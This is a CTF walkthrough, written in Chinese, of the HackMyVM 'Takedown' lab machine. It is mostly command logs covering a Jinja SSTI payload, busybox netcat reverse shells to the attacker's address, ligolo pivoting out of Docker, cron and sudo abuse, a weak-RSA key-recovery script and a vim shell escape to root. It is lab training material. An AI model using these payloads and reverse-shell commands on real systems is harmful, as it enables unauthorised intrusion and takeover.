HackMyVM-Takedown-Walkthrough

信息收集

服务探测

❯ sudo arp-scan -l
Password:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e4:1a:e5       VMware, Inc.
192.168.60.155  08:00:27:f9:39:a8       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:f5:9e:5f       VMware, Inc.

11 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.000 seconds (128.00 hosts/sec). 4 responded
❯ export ip=192.168.60.155
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Port scanning: Because every port has a story to tell.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.60.155:22
Open 192.168.60.155:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-30 21:38 CST
Initiating ARP Ping Scan at 21:38
Scanning 192.168.60.155 [1 port]
Completed ARP Ping Scan at 21:38, 0.03s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 21:38
Scanning textpattern.dsz (192.168.60.155) [2 ports]
Discovered open port 80/tcp on 192.168.60.155
Discovered open port 22/tcp on 192.168.60.155
Completed SYN Stealth Scan at 21:38, 0.02s elapsed (2 total ports)
Nmap scan report for textpattern.dsz (192.168.60.155)
Host is up, received arp-response (0.00036s latency).
Scanned at 2025-07-30 21:38:30 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:F9:39:A8 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

浏览器访问80端口，会跳转到域名

编辑hosts文件添加域名

❯ echo "$ip shieldweb.che"|sudo tee -a /etc/hosts
192.168.60.155 shieldweb.che

扫一下子域名

得到ticket.shieldweb.che

❯ gobuster vhost -u "shieldweb.che" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://shieldweb.che
[+] Method:          GET
[+] Threads:         10
[+] Wordlist:        /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: ticket.shieldweb.che Status: 200 [Size: 2131]

SSTI模板注入

存在输入框，尝试注入点

尝试得知Nombre:输入会出现回显，比如输入admin

存在SSTI模板注入

直接拿个shell吧

{{ cycler.__init__.__globals__.os.popen('busybox nc 192.168.60.100 4444 -e /bin/sh').read() }}

用户提权

监听端口

不过很明显是在docker容器里

❯ penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 →  127.0.0.1 • 192.168.60.100
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from Ariel-192.168.60.155-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/Ariel~192.168.60.155_Linux_x86_64/2025_07_30-21_45_46-325.log 📜
───────────────────────────────────────────────────────────────────────────
/app # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/app # hostname -i
172.21.0.2

同时还在容器中找到一些作者故意留下的日志信息

/var/log # ls -al
total 16
drwxr-xr-x    2 root     root          4096 Jun 23 15:30 .
drwxr-xr-x   11 root     root          4096 Jun 25 09:48 ..
-rw-r--r--    1 root     root           980 Jun 23 15:29 access.yml
-rw-r--r--    1 root     root           123 Jun 23 15:29 chat
/var/log # cat chat
Kevin: Love be careful what you do.
A.love: I don't know Kevin, it's just a moment.
Kevin: Remove that now.
A.Love: Go to.
凯文：爱，小心你做的事。  
爱：我不知道，凯文，这只是一个瞬间。  
凯文：现在把它移除。  
爱：去吧。
/var/log # cat access.yml
2023-08-31 10:15:42 - Usuario: jsmith - Accion: Inicio de sesion exitoso
2023-08-31 11:20:18 - Usuario: a_doe - Accion: Acceso a la carpeta /datos/confidenciales
2023-08-31 12:45:29 - Usuario: s_miller - Accion: Intento de acceso no autorizado
2023-08-31 14:30:05 - Usuario: jdoe - Accion: Creación de archivo nuevo_reporte.txt
2023-08-31 15:10:22 - Usuario: r_jones - Accion: Cierre de sesion

2023-08-31 16:55:11 - Usuario: l_smith - Accion: Edicion de archivo informe_trimestral.docx
2023-08-31 18:02:45 - Usuario: jbrown - Accion: Eliminacion accidental del archivo importante.pdf
2023-08-31 19:40:30 - Usuario: c_wilson - Accion: Copia de archivos a la carpeta compartida /datos/publicos
2023-08-31 20:15:17 - Usuario: m_johnson - Accion: Cambio de contrasena exitoso
2023-08-31 21:30:59 - Usuario: k_adams - Accion: Descarga de archivo confidencial_backup.zip

2023-08-31 22:45:00 - Usuario: A.love - Accion: Tarea cron ejecutada: */5 * * * * root bash /home/love/script/*

建立TUN隧道

❯ sudo ./proxy -selfcert
Password:
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
WARN[0000] Using self-signed certificates
WARN[0000] TLS Certificate fingerprint for ligolo is: 36C07692CB8DE46FF8EE2E7AE336EF247203DEBFCF7117298621D70583C93D3F
INFO[0000] Listening on 0.0.0.0:11601
    __    _             __
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /
        /____/                          /____/

  Made in France ♥            by @Nicocha30!
  Version: 0.7.5

ligolo-ng » interface_create --name docker
INFO[0008] Creating a new "docker" interface...
INFO[0008] Interface created!
ligolo-ng » INFO[0038] Agent joined.                                 id=13b87b1e-14da-4a93-84ed-e8d87d867409 name=root@Ariel remote="192.168.60.155:50132"
ligolo-ng » session
? Specify a session : 1 - root@Ariel - 192.168.60.155:50132 - 13b87b1e-14da-4a93-84ed-e8d87d867409
[Agent : root@Ariel] » tunnel_start --tun docker
[Agent : root@Ariel] » INFO[0049] Starting tunnel to root@Ariel (13b87b1e-14da-4a93-84ed-e8d87d867409)
-------------------------
❯ sudo ip route add 172.21.0.0/24 dev docker
--------------------------
/tmp/toolkit-YljkSuqG # ./ligolo_agent --connect 192.168.60.100:11601 --ign
ore-cert &
/tmp/toolkit-YljkSuqG # WARN[0000] warning, certificate validation disabled
INFO[0000] Connection established                        addr="192.168.60.100:11601"

其实不用建立也可以

定时任务

从上面的日志中可以看到存在love用户，并且会定期执行/home/love/script中的任何文件

查看容器挂载，发现宿主机中的/love/script被挂载到容器中的根目录/script中

尝试随意新建一个文件，过五分钟即可收到反弹的shell

用户家目录中存在提示

/script # echo "busybox nc 192.168.60.100 4444 -e /bin/bash">a.sh
/script # chmod +x a.sh
[!] Session detached ⇲

(Penelope)─(Session [1])> interact 2
[+] Interacting with session [2], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/osiris~192.168.60.155_Linux_x86_64/2025_07_30-22_20_02-261.log 📜
love@osiris:~$ cat note.txt
A.love:

Kevin this is a good icebreaker

we have icebreaker

jajajajjaja

S.A.S.
-----------------
A.love:

凯文，这是一个很好的破冰方式

我们有破冰方式

哈哈哈哈哈

S.A.S.

并且在/opt目录中存在另一个文件夹

love@osiris:/opt/Contempt$ ls -al
total 24
drwxr-xr-x 2 root root 4096 jun 28 19:09 .
drwxr-xr-x 3 root root 4096 ago 31  2023 ..
-rwx------ 1 root root 5722 jun 28 19:01 Contempt
-rw-r--r-- 1 root root  182 jun  2  2024 HELP
-rw-r--r-- 1 root root 1065 jun 26  2023 LICENSE
love@osiris:/opt/Contempt$ cat HELP
Estos son los comandos disponibles:
- RCE: Ejecucion remota de comandos
- exploit: Ejecutar Exploit para intrusion al Servidor
- worm: Desplegar gusano para  infectar el Servidor
以下是可用的命令：
- RCE：远程命令执行
- exploit：执行漏洞利用以入侵服务器
- worm：部署蠕虫以感染服务器

Sudo提权

然而mitnick用户存在sudo权限

可以执行命令，提权到mitnick用户，其实这个用户不用提权也没事

love@osiris:~$ sudo -l
Matching Defaults entries for love on osiris:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User love may run the following commands on osiris:
    (mitnick) NOPASSWD: /home/mitnick/sas
love@osiris:~$ echo 'busybox nc 192.168.60.100 4444 -e /bin/bash' > a.sh
love@osiris:~$ chmod +x a.sh
love@osiris:~$ sudo -u mitnick /home/mitnick/sas
  SSSSS            AAA             SSSSS
 S     S          A   A           S     S
 S               A     A          S
  SSSSS          A     A           SSSSS
       S   ###   AAAAAAA    ###         S
 S     S   ###   A     A    ###   S     S
  SSSSS          A     A           SSSSS
SAS v1.0
(c) SWITCHED ACCESS SERVICES 2023 Aquilino Morcillo

sas -h Available commands
# sas -h
Available commands:
sas_call - listen to Services
ls - List files and directories
cat <filename> - Display contents of a file
whoami - Show current user
sas help (-h) - Show available commands
version (-v) - Show application version
run <filename> - Execute a file
dir - Show the content of the current directory in wide format
# run a.sh
[+] Got reverse shell from osiris-192.168.60.155-Linux-x86_64 😍️ Assigned SessionID <4>
(Penelope)─(Session [2])> interact 4
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [4], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/osiris~192.168.60.155_Linux_x86_64/2025_08_25-00_15_40-154.log 📜
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
mitnick@osiris:/home/love$ id
uid=1003(mitnick) gid=1003(mitnick) grupos=1003(mitnick)
mitnick@osiris:/home/love$ cd ~
mitnick@osiris:~$ ls
publickey.pub  sas  secret.enc

因为此用户文件夹是其他人可读的

enc解密

在家目录中存在publickey.pub和secret.enc，所以问题是需要解密secret.enc

mitnick@osiris:~$ cat publickey.pub
-----BEGIN PUBLIC KEY-----
MDwwDQYJKoZIhvcNAQEBBQADKwAwKAIhAMov+hb0LOJW4z6w03Tv8yNswYDXkEMj
DJE46jQH3sERAgMBAAE=
-----END PUBLIC KEY-----
mitnick@osiris:~$ file secret.enc
secret.enc: data

可以看到公钥是非常短的，所以可以解密

详细参考HackMyVM-Hell-Walkthrough | Pepster’Blog

[!] Session detached ⇲

(Penelope)─(Session [4])> download publickey.pub
[+] Download OK '/home/Pepster/.penelope/osiris~192.168.60.155_Linux_x86_64/downloads/home/mitnick/publickey.pub'
(Penelope)─(Session [4])> download secret.enc
[+] Download OK '/home/Pepster/.penelope/osiris~192.168.60.155_Linux_x86_64/downloads/home/mitnick/secret.enc
❯ cd /home/Pepster/.penelope/osiris~192.168.60.155_Linux_x86_64/downloads/home/mitnick/
❯ python3 exp.py
[+]e==>65537
[+]n==>91451963281284582263822096491513116919368195592939782118118773662653066690833

• exp.py

  #!/usr/bin/python3
  from Crypto.PublicKey import RSA
  
  n=91451963281284582263822096491513116919368195592939782118118773662653066690833
  e=65537
  p=272799705830086927219936172916283678397
  q=335234831001780341003153415948249295589
  
  m=n-(p+q-1)
  
  def egcd(a, b):
      if a == 0:
          return (b, 0, 1)
      else:
          g, y, x = egcd(b % a, a)
          return (g, x - (b // a) * y, y)
  
  def modinv(a, m):
      g, x, y = egcd(a, m)
      if g != 1:
          raise
      else:
          return x % m
  
  d = modinv(e, m)
  
  key = RSA.construct((n, e, d, p, q))
  print(key.exportKey().decode())

执行脚本，得到私钥内容

❯ python3 exp2.py|tee id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIGrAgEAAiEAyi/6FvQs4lbjPrDTdO/zI2zBgNeQQyMMkTjqNAfewRECAwEAAQIh
AK3yTsf2tLLZq9IgkRv24AbdmxAYvRgmyA/I66tUb+SRAhEAzTtP7imRDzra1nQc
iVoevQIRAPwz4UPuS1/rYZM0Z6+TauUCEEApf+a8dg5l3w7WxCko1J0CEQDNdEIm
AeF7kZhawE1bdh+VAhA2aIpbJ2l3E4AlMpOlMIo6

这样就可以使用私钥解密secret.enc

❯ openssl pkeyutl -decrypt -in secret.enc -inkey id_rsa -out decrypted.txt
❯ cat decrypted.txt
sh1m0mur4Bl4ckh4t

Root提权

切换用户登入上去即可

mitnick@osiris:/home$ su tomu
Contraseña:
tomu@osiris:/home$ id
uid=1001(tomu) gid=1001(tomu) grupos=1001(tomu)
tomu@osiris:/home$ cd ~
tomu@osiris:~$ ls
nokitel.md  nokitel.png  user.txt
tomu@osiris:~$ cat user.txt
612701a03669485d94bc687449fdab39

用户存在sudo权限

tomu@osiris:~$ sudo -l
[sudo] password for tomu:
Matching Defaults entries for tomu on osiris:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tomu may run the following commands on osiris:
    (root) /opt/Contempt/Contempt
tomu@osiris:~$ sudo /opt/Contempt/Contempt

会进入GUI界面，选择第二个即可进入vim程序

正常提权即可，底行模式:!/bin/bash

root@osiris:/home/tomu# id
uid=0(root) gid=0(root) grupos=0(root)
root@osiris:/home/tomu# cat /root/root.sh
#!/bin/sh

clear

greenColour="\e[0;32m\033[1m"
endColour="\033[0m\e[0m"

printf "\n${greenColour}███████╗██████╗ ███████╗███████╗    ███╗   ███╗██╗████████╗███╗   ██╗██╗ ██████╗██╗  ██╗"
printf "\n${greenColour}██╔════╝██╔══██╗██╔════╝██╔════╝    ████╗ ████║██║╚══██╔══╝████╗  ██║██║██╔════╝██║ ██╔╝"
printf "\n${greenColour}█████╗  ██████╔╝█████╗  █████╗      ██╔████╔██║██║   ██║   ██╔██╗ ██║██║██║     █████╔╝ "
printf "\n${greenColour}██╔══╝  ██╔══██╗██╔══╝  ██╔══╝      ██║╚██╔╝██║██║   ██║   ██║╚██╗██║██║██║     ██╔═██╗ "
printf "\n${greenColour}██║     ██║  ██║███████╗███████╗    ██║ ╚═╝ ██║██║   ██║   ██║ ╚████║██║╚██████╗██║  ██╗"
printf "\n${greenColour}╚═╝     ╚═╝  ╚═╝╚══════╝╚══════╝    ╚═╝     ╚═╝╚═╝   ╚═╝   ╚═╝  ╚═══╝╚═╝ ╚═════╝╚═╝  ╚═╝\n${endColour}"
printf "\t\nflag --> 1e271c5ce97e76ae8417a95c74085fba \n"